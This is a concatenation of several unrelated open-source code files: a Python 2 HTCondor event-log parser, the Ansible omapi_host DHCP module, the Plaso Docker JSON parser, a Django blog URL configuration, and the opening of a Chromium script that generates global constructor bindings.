self.SetVerifier( EventVerifier( patterns, 0, None ) )
def EventNum( self ) :
return 9
# Job was suspended ULOG_JOB_SUSPENDED = 10
class JobSuspendedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 10, "job suspended", BaseRealEvent )
def EventNum( self ) :
return 10
# Job was unsuspended ULOG_JOB_UNSUSPENDED = 11
class JobUnsuspendedEvent( BaseEvent ) :
class RealEvent( BaseRealEvent ) :
def __init__( self, base, header ) :
BaseRealEvent.__init__( self, base, header )
def __init__( self ) :
BaseEvent.__init__( self, 11, "job unsuspended", BaseRealEvent )
def EventNum( self ) :
return 11
# Job was held ULOG_JOB_HELD = 12
class JobHeldEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 12, "job held", BaseRealEvent )
def EventNum( self ) :
return 12
# Job was released ULOG_JOB_RELEASED = 13
class JobReleasedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 13, "job released", BaseRealEvent )
def EventNum( self ) :
return 13
# Parallel Node executed ULOG_NODE_EXECUTE = 14
class NodeExecuteEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 14, "node executed", BaseRealEvent )
def EventNum( self ) :
return 14
# Parallel Node terminated ULOG_NODE_TERMINATED = 15
class NodeTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 15, "node terminated", BaseRealEvent )
def EventNum( self ) :
return 15
# POST script terminated ULOG_POST_SCRIPT_TERMINATED = 16
class PostScriptTerminateEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 16, "post script terminated", BaseRealEvent )
def EventNum( self ) :
return 16
# Job Submitted to Globus ULOG_GLOBUS_SUBMIT = 17
class GlobusSubmitEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 17, "globus submit", BaseRealEvent )
def EventNum( self ) :
return 17
# Globus Submit failed ULOG_GLOBUS_SUBMIT_FAILED = 18
class GlobusSubmitFailedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 18, "globus submit failed", BaseRealEvent )
def EventNum( self ) :
return 18
# Globus Resource Up ULOG_GLOBUS_RESOURCE_UP = 19
class GlobusResourceUpEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 19, "globus resource up", BaseRealEvent )
def EventNum( self ) :
return 19
# Globus Resource Down ULOG_GLOBUS_RESOURCE_DOWN = 20
class GlobusResourceDownEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 20, "globus resource down", BaseRealEvent )
def EventNum( self ) :
return 20
# Remote Error ULOG_REMOTE_ERROR = 21
class RemoteErrorEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 21, "remote error", BaseRealEvent )
def EventNum( self ) :
return 21
# RSC socket lost ULOG_JOB_DISCONNECTED = 22
class JobDisconnectedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 22, "job disconnected", BaseRealEvent )
def EventNum( self ) :
return 22
# RSC socket re-established ULOG_JOB_RECONNECTED = 23
class JobReconnectedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 23, "job reconnected", BaseRealEvent )
def EventNum( self ) :
return 23
# RSC reconnect failure ULOG_JOB_RECONNECT_FAILED = 24
class JobReconnectFailedEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 24, "job reconnect failed", BaseRealEvent )
def EventNum( self ) :
return 24
# Grid Resource Up ULOG_GRID_RESOURCE_UP = 25
class GridResourceUpEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 25, "grid resource up", BaseRealEvent )
def EventNum( self ) :
return 25
# Grid Resource Down ULOG_GRID_RESOURCE_DOWN = 26
class GridResourceDownEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 26, "grid resource down", BaseRealEvent )
def EventNum( self ) :
return 26
# Job Submitted remotely ULOG_GRID_SUBMIT = 27
class GridSubmitEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 27, "grid resource submit", BaseRealEvent )
def EventNum( self ) :
return 27
# Report job ad information ULOG_JOB_AD_INFORMATION = 28
class JobAdInformationEvent( BaseEvent ) :
def __init__( self ) :
BaseEvent.__init__( self, 28, "job ad information", BaseRealEvent )
def EventNum( self ) :
return 28
class EventParserException( Exception ) :
pass
# Event log parser
class EventParser( object ) :
class EventLookup( object ) :
def __init__( self, event_class ) :
self.__event_class = event_class
try :
self.__event = event_class( )
except Exception, e :
print >> sys.stderr, "Can't create", event_class, ":", e
def HeaderMatch( self, header ) :
return self.__event.HeaderNumCheck( header )
def Type( self ) :
return self.__event_class
def GenEvent( self, header ) :
try:
return self.__event.GenRealEvent( header )
except Exception, e :
print >> sys.stderr, "Can't create", self.__event_class, ":", e
return None
def __init__( self ) :
self._verbose = 0
self._quiet = False
self._year = time.localtime().tm_year
self._year_str = "%04d" % ( self._year )
self.__lookup = (
self.EventLookup( SubmitEvent ),
self.EventLookup( ExecuteEvent ),
self.EventLookup( ExecutableErrorEvent ),
self.EventLookup( CheckpointEvent ),
self.EventLookup( JobEvictedEvent ),
self.EventLookup( JobTerminateEvent ),
self.EventLookup( ImageSizeEvent ),
self.EventLookup( ShadowExceptionEvent ),
self.EventLookup( GenericEvent ),
self.EventLookup( JobAbortedEvent ),
self.EventLookup( JobSuspendedEvent ),
self.EventLookup( JobUnsuspendedEvent ),
self.EventLookup( JobHeldEvent ),
self.EventLookup( JobReleasedEvent ),
self.EventLookup( NodeExecuteEvent ),
self.EventLookup( NodeTerminateEvent ),
self.EventLookup( PostScriptTerminateEvent ),
self.EventLookup( GlobusSubmitFailedEvent ),
self.EventLookup( GlobusResourceUpEvent ),
self.EventLookup( GlobusResourceDownEvent ),
self.EventLookup( RemoteErrorEvent ),
self.EventLookup( JobDisconnectedEvent ),
self.EventLookup( JobReconnectedEvent ),
self.EventLookup( JobReconnectFailedEvent ),
self.EventLookup( GridResourceUpEvent ),
self.EventLookup( GridResourceDownEvent ),
self.EventLookup( GridSubmitEvent ),
)
def Verbose( self, v = None ) :
if v is not None :
self._verbose = v
return self._verbose
def Quiet( self, q = None ) :
if q is not None :
self._quiet = q
return self._quiet
def GenHeaderFromReMatch( self, line, re_match ) :
event_num = int(re_match.group(1))
cluster = int(re_match.group(2))
proc = int(re_match.group(3))
subproc = int(re_match.group(4))
time_str = self._year_str+"/"+re_match.group(5)
text = re_match.group(6)
try:
event_time = time.strptime( time_str, '%Y/%m/%d %H:%M:%S' )
except Exception, e:
print >>sys.stderr, \
"header line time parse error '"+time_str+"':", e
return None
return EventHeader( event_num, cluster, proc, subproc,
event_time, text )
def ParseHeaderLine( self, line ) :
m = _patterns.FindHeaderInLine( line, True )
if m is None :
return None
return self.GenHeaderFromReMatch( line, m )
def GetEventFromHeader( self, header ) :
for lookup in self.__lookup :
if lookup.HeaderMatch( header ) :
return lookup.GenEvent( header )
return None
class EventLogParser( EventParser ) :
def __init__( self, filename ) :
self._filename = filename
try:
self._file = open( filename )
except Exception, e:
s = "Failed to open", filename, ":", e
print >>sys.stderr, s
raise Exception( s )
self._line = None
self._line_num = 0
self._num_events = 0
self._event_counts = { }
EventParser.__init__( self )
def GetFileName( self ) :
return self._filename
def GetFile( self ) :
return self._file
def GetLine( self ) :
return self._line
def GetLineNum( self ) :
return self._line_num
def GetNumEvents( self, name = None ) :
if name is None :
return self._num_events
else :
return self._event_counts.get( name, 0 )
def GetEventNames( self ) :
return self._event_counts.keys()
def ReadEventBody( self, header, fobj ) :
event = self.GetEventFromHeader( header )
if event is None :
s = "%s %d (type %d)" % ( self.GetFileName(),
self.GetLineNum(),
header.EventNum() )
raise EventParserException( s )
# Now, read it from the file
for line in fobj :
line = line.rstrip()
self._line_num += 1
if _patterns.LineHasHeader( line ) :
s = "%s %d: unexpected header" % ( self._filename,
self._line_num )
raise EventParserException( s )
if event.ProcessEventLine( line ) :
break
return event
def ParseLog( self, die ) :
for l in self._file :
self._line = l.rstrip()
self._line_num += 1
header = self.ParseHeaderLine( self._line )
if header is None :
s = "%s line %d: '%s': header line expected" % \
( self._filename, self._line_num, self._line )
self.HandleParseError( s )
continue
header.SetLineInfo( self._filename, self._line_num, self._line )
event = None
try:
event = self.ReadEventBody( header, self._file )
except EventParserException, e:
s = "Invalid event: %s" % ( str(e) )
self.HandleParseError( s )
if event is not None :
self._num_events += 1
name = event.EventName()
if not name in self._event_counts :
self._event_counts[name] = 0
self._event_counts[name] += 1
self.ProcessEvent( event )
if self.Verbose() :
event.Print( self.Verbose() )
def ProcessEvent( self, event ) :
pass
def HandleParseError( self, s ) :
raise EventParserException( e )
### Local Variables: ***
### py-indent-offset:4 ***
### python-indent:4 ***
### python-continuation-offset:4 ***
### tab-width:4 ***
### End: ***
| apache-2.0 | 8,822,964,728,051,052,000 | 34.272334 | 79 | 0.544753 | false |
qrkourier/ansible | lib/ansible/modules/net_tools/omapi_host.py | 29 | 11915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Loic Blot <[email protected]>
# Sponsored by Infopro Digital. http://www.infopro-digital.com/
# Sponsored by E.T.A.I. http://www.etai.fr/
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: omapi_host
short_description: Setup OMAPI hosts.
description:
- Create, update and remove OMAPI hosts into compatible DHCPd servers.
version_added: "2.3"
requirements:
- pypureomapi
author: "Loic Blot (@nerzhul)"
options:
state:
description:
- Create or remove OMAPI host.
required: true
choices: ['present', 'absent']
name:
description:
- Sets the host lease hostname (mandatory if state=present).
default: None
host:
description:
- Sets OMAPI server host to interact with.
default: localhost
port:
description:
- Sets the OMAPI server port to interact with.
default: 7911
key_name:
description:
- Sets the TSIG key name for authenticating against OMAPI server.
required: true
key:
description:
- Sets the TSIG key content for authenticating against OMAPI server.
required: true
macaddr:
description:
- Sets the lease host MAC address.
required: true
ip:
description:
- Sets the lease host IP address.
required: false
default: None
statements:
description:
- Attach a list of OMAPI DHCP statements with host lease (without ending semicolon).
required: false
default: []
ddns:
description:
- Enable dynamic DNS updates for this host.
required: false
default: false
'''
EXAMPLES = '''
- name: Remove a host using OMAPI
omapi_host:
key_name: "defomapi"
key: "+bFQtBCta6j2vWkjPkNFtgA=="
host: "10.1.1.1"
macaddr: "00:66:ab:dd:11:44"
state: absent
- name: Add a host using OMAPI
omapi_host:
key_name: "defomapi"
key: "+bFQtBCta6j2vWkjPkNFtgA=="
host: "10.98.4.55"
macaddr: "44:dd:ab:dd:11:44"
name: "server01"
ip: "192.168.88.99"
ddns: yes
statements:
- 'filename "pxelinux.0"'
- 'next-server 1.1.1.1'
state: present
'''
RETURN = '''
changed:
description: If module has modified a host
returned: success
type: string
lease:
description: dictionary containing host information
returned: success
type: complex
contains:
ip-address:
description: IP address, if there is.
returned: success
type: string
sample: '192.168.1.5'
hardware-address:
description: MAC address
returned: success
type: string
sample: '00:11:22:33:44:55'
hardware-type:
description: hardware type, generally '1'
returned: success
type: int
sample: 1
name:
description: hostname
returned: success
type: string
sample: 'mydesktop'
'''
import binascii
import socket
import struct
import traceback
try:
from pypureomapi import Omapi, OmapiMessage, OmapiError, OmapiErrorNotFound
from pypureomapi import pack_ip, unpack_ip, pack_mac, unpack_mac
from pypureomapi import OMAPI_OP_STATUS, OMAPI_OP_UPDATE
pureomapi_found = True
except ImportError:
pureomapi_found = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_native
class OmapiHostManager:
def __init__(self, module):
self.module = module
self.omapi = None
self.connect()
def connect(self):
try:
self.omapi = Omapi(self.module.params['host'], self.module.params['port'], self.module.params['key_name'],
self.module.params['key'])
except binascii.Error:
self.module.fail_json(msg="Unable to open OMAPI connection. 'key' is not a valid base64 key.")
except OmapiError as e:
self.module.fail_json(msg="Unable to open OMAPI connection. Ensure 'host', 'port', 'key' and 'key_name' "
"are valid. Exception was: %s" % to_native(e))
except socket.error as e:
self.module.fail_json(msg="Unable to connect to OMAPI server: %s" % to_native(e))
def get_host(self, macaddr):
msg = OmapiMessage.open(to_bytes("host", errors='surrogate_or_strict'))
msg.obj.append((to_bytes("hardware-address", errors='surrogate_or_strict'), pack_mac(macaddr)))
msg.obj.append((to_bytes("hardware-type", errors='surrogate_or_strict'), struct.pack("!I", 1)))
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_UPDATE:
return None
return response
@staticmethod
def unpack_facts(obj):
result = dict(obj)
if 'hardware-address' in result:
result['hardware-address'] = unpack_mac(result['hardware-address'])
if 'ip-address' in result:
result['ip-address'] = unpack_ip(result['ip-address'])
if 'hardware-type' in result:
result['hardware-type'] = struct.unpack("!I", result['hardware-type'])
return result
def setup_host(self):
if self.module.params['hostname'] is None or len(self.module.params['hostname']) == 0:
self.module.fail_json(msg="name attribute could not be empty when adding or modifying host.")
msg = None
host_response = self.get_host(self.module.params['macaddr'])
# If host was not found using macaddr, add create message
if host_response is None:
msg = OmapiMessage.open(to_bytes('host', errors='surrogate_or_strict'))
msg.message.append(('create', struct.pack('!I', 1)))
msg.message.append(('exclusive', struct.pack('!I', 1)))
msg.obj.append(('hardware-address', pack_mac(self.module.params['macaddr'])))
msg.obj.append(('hardware-type', struct.pack('!I', 1)))
msg.obj.append(('name', self.module.params['hostname']))
if self.module.params['ip'] is not None:
msg.obj.append((to_bytes("ip-address", errors='surrogate_or_strict'), pack_ip(self.module.params['ip'])))
stmt_join = ""
if self.module.params['ddns']:
stmt_join += 'ddns-hostname "{0}"; '.format(self.module.params['hostname'])
try:
if len(self.module.params['statements']) > 0:
stmt_join += "; ".join(self.module.params['statements'])
stmt_join += "; "
except TypeError as e:
self.module.fail_json(msg="Invalid statements found: %s" % to_native(e),
exception=traceback.format_exc())
if len(stmt_join) > 0:
msg.obj.append(('statements', stmt_join))
try:
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_UPDATE:
self.module.fail_json(msg="Failed to add host, ensure authentication and host parameters "
"are valid.")
self.module.exit_json(changed=True, lease=self.unpack_facts(response.obj))
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
# Forge update message
else:
response_obj = self.unpack_facts(host_response.obj)
fields_to_update = {}
if to_bytes('ip-address', errors='surrogate_or_strict') not in response_obj or \
unpack_ip(response_obj[to_bytes('ip-address', errors='surrogate_or_strict')]) != self.module.params['ip']:
fields_to_update['ip-address'] = pack_ip(self.module.params['ip'])
# Name cannot be changed
if 'name' not in response_obj or response_obj['name'] != self.module.params['hostname']:
self.module.fail_json(msg="Changing hostname is not supported. Old was %s, new is %s. "
"Please delete host and add new." %
(response_obj['name'], self.module.params['hostname']))
"""
# It seems statements are not returned by OMAPI, then we cannot modify them at this moment.
if 'statements' not in response_obj and len(self.module.params['statements']) > 0 or \
response_obj['statements'] != self.module.params['statements']:
with open('/tmp/omapi', 'w') as fb:
for (k,v) in iteritems(response_obj):
fb.writelines('statements: %s %s\n' % (k, v))
"""
if len(fields_to_update) == 0:
self.module.exit_json(changed=False, lease=response_obj)
else:
msg = OmapiMessage.update(host_response.handle)
msg.update_object(fields_to_update)
try:
response = self.omapi.query_server(msg)
if response.opcode != OMAPI_OP_STATUS:
self.module.fail_json(msg="Failed to modify host, ensure authentication and host parameters "
"are valid.")
self.module.exit_json(changed=True)
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
def remove_host(self):
try:
self.omapi.del_host(self.module.params['macaddr'])
self.module.exit_json(changed=True)
except OmapiErrorNotFound:
self.module.exit_json()
except OmapiError as e:
self.module.fail_json(msg="OMAPI error: %s" % to_native(e), exception=traceback.format_exc())
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, type='str', choices=['present', 'absent']),
host=dict(type='str', default="localhost"),
port=dict(type='int', default=7911),
key_name=dict(required=True, type='str', default=None),
key=dict(required=True, type='str', default=None, no_log=True),
macaddr=dict(required=True, type='str', default=None),
hostname=dict(type='str', default=None, aliases=['name']),
ip=dict(type='str', default=None),
ddns=dict(type='bool', default=False),
statements=dict(type='list', default=[])
),
supports_check_mode=False
)
if not pureomapi_found:
module.fail_json(msg="pypureomapi library is required by this module.")
if module.params['key'] is None or len(module.params["key"]) == 0:
module.fail_json(msg="'key' parameter cannot be empty.")
if module.params['key_name'] is None or len(module.params["key_name"]) == 0:
module.fail_json(msg="'key_name' parameter cannot be empty.")
host_manager = OmapiHostManager(module)
try:
if module.params['state'] == 'present':
host_manager.setup_host()
elif module.params['state'] == 'absent':
host_manager.remove_host()
except ValueError as e:
module.fail_json(msg="OMAPI input value error: %s" % to_native(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
| gpl-3.0 | 7,198,465,932,404,070,000 | 36.705696 | 134 | 0.579689 | false |
log2timeline/plaso | plaso/parsers/docker.py | 3 | 12935 | # -*- coding: utf-8 -*-
"""Parser for Docker configuration and log files."""
import codecs
import json
import os
from dfdatetime import semantic_time as dfdatetime_semantic_time
from dfdatetime import time_elements as dfdatetime_time_elements
from dfvfs.helpers import text_file
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.parsers import manager
from plaso.parsers import interface
class DockerJSONContainerLogEventData(events.EventData):
"""Docker container's log event data.
Attributes:
container_id (str): identifier of the container (sha256).
log_line (str): log line.
log_source (str): log source.
"""
DATA_TYPE = 'docker:json:container:log'
def __init__(self):
"""Initializes event data."""
super(DockerJSONContainerLogEventData, self).__init__(
data_type=self.DATA_TYPE)
self.container_id = None
self.log_line = None
self.log_source = None
class DockerJSONContainerEventData(events.EventData):
"""Docker container configuration event data.
Attributes:
action (str): whether the container was created, started, or finished.
container_id (str): identifier of the container (SHA256).
container_name (str): name of the container.
"""
DATA_TYPE = 'docker:json:container'
def __init__(self):
"""Initializes event data."""
super(DockerJSONContainerEventData, self).__init__(data_type=self.DATA_TYPE)
self.container_id = None
self.container_name = None
self.action = None
class DockerJSONLayerEventData(events.EventData):
"""Docker file system layer configuration event data.
Attributes:
command: the command used which made Docker create a new layer.
layer_id: the identifier of the current Docker layer (SHA-1).
"""
DATA_TYPE = 'docker:json:layer'
def __init__(self):
"""Initializes event data."""
super(DockerJSONLayerEventData, self).__init__(data_type=self.DATA_TYPE)
self.command = None
self.layer_id = None
class DockerJSONParser(interface.FileObjectParser):
"""Parser for Docker json configuration and log files.
This handles :
* Per container config file
DOCKER_DIR/containers/<container_id>/config.json
* Per container stdout/stderr output log
DOCKER_DIR/containers/<container_id>/<container_id>-json.log
* Filesystem layer config files
DOCKER_DIR/graph/<layer_id>/json
"""
NAME = 'dockerjson'
DATA_FORMAT = 'Docker configuration and log JSON file'
_ENCODING = 'utf-8'
def _GetIdentifierFromPath(self, parser_mediator):
"""Extracts a container or a graph ID from a JSON file's path.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
Returns:
str: container or graph identifier.
"""
file_entry = parser_mediator.GetFileEntry()
path = file_entry.path_spec.location
file_system = file_entry.GetFileSystem()
path_segments = file_system.SplitPath(path)
return path_segments[-2]
def _ParseLayerConfigJSON(self, parser_mediator, file_object):
"""Extracts events from a Docker filesystem layer configuration file.
The path of each filesystem layer config file is:
DOCKER_DIR/graph/<layer_id>/json
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file is not a valid layer config file.
"""
file_content = file_object.read()
file_content = codecs.decode(file_content, self._ENCODING)
json_dict = json.loads(file_content)
if 'docker_version' not in json_dict:
raise errors.UnableToParseFile(
'not a valid Docker layer configuration file, missing '
'\'docker_version\' key.')
time_string = json_dict.get('created', None)
if time_string is not None:
layer_creation_command_array = [
x.strip() for x in json_dict['container_config']['Cmd']]
layer_creation_command = ' '.join(layer_creation_command_array).replace(
'\t', '')
event_data = DockerJSONLayerEventData()
event_data.command = layer_creation_command
event_data.layer_id = self._GetIdentifierFromPath(parser_mediator)
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse created time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseContainerConfigJSON(self, parser_mediator, file_object):
"""Extracts events from a Docker container configuration file.
The path of each container config file is:
DOCKER_DIR/containers/<container_id>/config.json
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file is not a valid container config file.
"""
file_content = file_object.read()
file_content = codecs.decode(file_content, self._ENCODING)
json_dict = json.loads(file_content)
if 'Driver' not in json_dict:
raise errors.UnableToParseFile(
'not a valid Docker container configuration file, ' 'missing '
'\'Driver\' key.')
container_id_from_path = self._GetIdentifierFromPath(parser_mediator)
container_id_from_json = json_dict.get('ID', None)
if not container_id_from_json:
raise errors.UnableToParseFile(
'not a valid Docker layer configuration file, the \'ID\' key is '
'missing from the JSON dict (should be {0:s})'.format(
container_id_from_path))
if container_id_from_json != container_id_from_path:
raise errors.UnableToParseFile(
'not a valid Docker container configuration file. The \'ID\' key of '
'the JSON dict ({0:s}) is different from the layer ID taken from the'
' path to the file ({1:s}) JSON file.)'.format(
container_id_from_json, container_id_from_path))
if 'Config' in json_dict and 'Hostname' in json_dict['Config']:
container_name = json_dict['Config']['Hostname']
else:
container_name = 'Unknown container name'
event_data = DockerJSONContainerEventData()
event_data.container_id = container_id_from_path
event_data.container_name = container_name
json_state = json_dict.get('State', None)
if json_state is not None:
time_string = json_state.get('StartedAt', None)
if time_string is not None:
event_data.action = 'Container Started'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container start time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_START)
parser_mediator.ProduceEventWithEventData(event, event_data)
time_string = json_state.get('FinishedAt', None)
if time_string is not None:
# If the timestamp is 0001-01-01T00:00:00Z, the container
# is still running, so we don't generate a Finished event
if time_string != '0001-01-01T00:00:00Z':
event_data.action = 'Container Finished'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container finish time string: {0:s} with '
'error: {1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_END)
parser_mediator.ProduceEventWithEventData(event, event_data)
time_string = json_dict.get('Created', None)
if time_string is not None:
event_data.action = 'Container Created'
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse container created time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def _ParseContainerLogJSON(self, parser_mediator, file_object):
"""Extract events from a Docker container log files.
The format is one JSON formatted log message per line.
The path of each container log file (which logs the container stdout and
stderr) is:
DOCKER_DIR/containers/<container_id>/<container_id>-json.log
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
"""
container_id = self._GetIdentifierFromPath(parser_mediator)
text_file_object = text_file.TextFile(file_object)
for log_line in text_file_object:
json_log_line = json.loads(log_line)
time_string = json_log_line.get('time', None)
if time_string is None:
continue
event_data = DockerJSONContainerLogEventData()
event_data.container_id = container_id
event_data.log_line = json_log_line.get('log', None)
event_data.log_source = json_log_line.get('stream', None)
try:
date_time = dfdatetime_time_elements.TimeElementsInMicroseconds()
date_time.CopyFromStringISO8601(time_string)
except ValueError as exception:
parser_mediator.ProduceExtractionWarning((
'Unable to parse written time string: {0:s} with error: '
'{1!s}').format(time_string, exception))
date_time = dfdatetime_semantic_time.InvalidTime()
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseFileObject(self, parser_mediator, file_object):
"""Parses various Docker configuration and log files in JSON format.
This methods checks whether the file_object points to a docker JSON config
or log file, and calls the corresponding _Parse* function to generate
Events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
ValueError: if the JSON file cannot be decoded.
"""
# Trivial JSON format check: first character must be an open brace.
if file_object.read(1) != b'{':
raise errors.UnableToParseFile(
'is not a valid JSON file, missing opening brace.')
file_object.seek(0, os.SEEK_SET)
file_entry = parser_mediator.GetFileEntry()
file_system = file_entry.GetFileSystem()
json_file_path = parser_mediator.GetDisplayName()
split_path = file_system.SplitPath(json_file_path)
try:
if 'containers' in split_path:
# For our intent, both version of the config file can be parsed
# the same way
if split_path[-1] in ['config.json', 'config.v2.json']:
self._ParseContainerConfigJSON(parser_mediator, file_object)
if json_file_path.endswith('-json.log'):
self._ParseContainerLogJSON(parser_mediator, file_object)
elif 'graph' in split_path:
if 'json' in split_path:
self._ParseLayerConfigJSON(parser_mediator, file_object)
except ValueError as exception:
if exception == 'No JSON object could be decoded':
raise errors.UnableToParseFile(exception)
raise
manager.ParsersManager.RegisterParser(DockerJSONParser)
| apache-2.0 | -6,820,813,953,497,394,000 | 36.063037 | 80 | 0.684345 | false |
lichi6174/django-api-lab | src/blog/urls.py | 1 | 1740 | """blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from accounts.views import (login_view, register_view, logout_view)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^comments/', include("comments.urls", namespace='comments')),
url(r'^register/', register_view, name='register'),
url(r'^login/', login_view, name='login'),
url(r'^logout/', logout_view, name='logout'),
url(r'^', include("posts.urls", namespace='posts')),
url(r'^api/posts/', include("posts.api.urls", namespace='posts-api')),
url(r'^api/comments/', include("comments.api.urls", namespace='comments-api')),
url(r'^api/users/', include("accounts.api.urls", namespace='users-api')),
#url(r'^posts/$', "<appname>.views.<function_name>"),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | mit | 4,748,679,259,774,233,000 | 41.463415 | 83 | 0.69023 | false |
ondra-novak/blink | Source/bindings/scripts/generate_global_constructors.py | 15 | 8212 | #!/usr/bin/python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates interface properties on global objects.
Concretely these are implemented as "constructor attributes", meaning
"attributes whose name ends with Constructor" (special-cased by code generator),
hence "global constructors" for short.
For reference on global objects, see:
http://heycam.github.io/webidl/#Global
http://heycam.github.io/webidl/#Exposed
Design document: http://www.chromium.org/developers/design-documents/idl-build
"""
import itertools
import optparse
import os
import cPickle as pickle
import re
import sys
from collections import defaultdict
from utilities import get_file_contents, idl_filename_to_interface_name, read_file_to_list, write_file, get_interface_extended_attributes_from_idl, is_callback_interface_from_idl
interface_name_to_global_names = {}
global_name_to_constructors = defaultdict(list)
HEADER_FORMAT = """// Stub header file for {{idl_basename}}
// Required because the IDL compiler assumes that a corresponding header file
// exists for each IDL file.
"""
def parse_options():
parser = optparse.OptionParser()
parser.add_option('--idl-files-list', help='file listing IDL files')
parser.add_option('--global-objects-file', help='pickle file of global objects')
parser.add_option('--write-file-only-if-changed', type='int', help='if true, do not write an output file if it would be identical to the existing one, which avoids unnecessary rebuilds in ninja')
options, args = parser.parse_args()
if options.idl_files_list is None:
parser.error('Must specify a file listing IDL files using --idl-files-list.')
if options.global_objects_file is None:
parser.error('Must specify a pickle file of global objects using --global-objects-file.')
if options.write_file_only_if_changed is None:
parser.error('Must specify whether output files are only written if changed using --write-file-only-if-changed.')
options.write_file_only_if_changed = bool(options.write_file_only_if_changed)
return options, args
def flatten_list(iterable):
return list(itertools.chain.from_iterable(iterable))
def interface_name_to_constructors(interface_name):
"""Returns constructors for an interface."""
global_names = interface_name_to_global_names[interface_name]
return flatten_list(global_name_to_constructors[global_name]
for global_name in global_names)
def record_global_constructors(idl_filename):
interface_name = idl_filename_to_interface_name(idl_filename)
full_path = os.path.realpath(idl_filename)
idl_file_contents = get_file_contents(full_path)
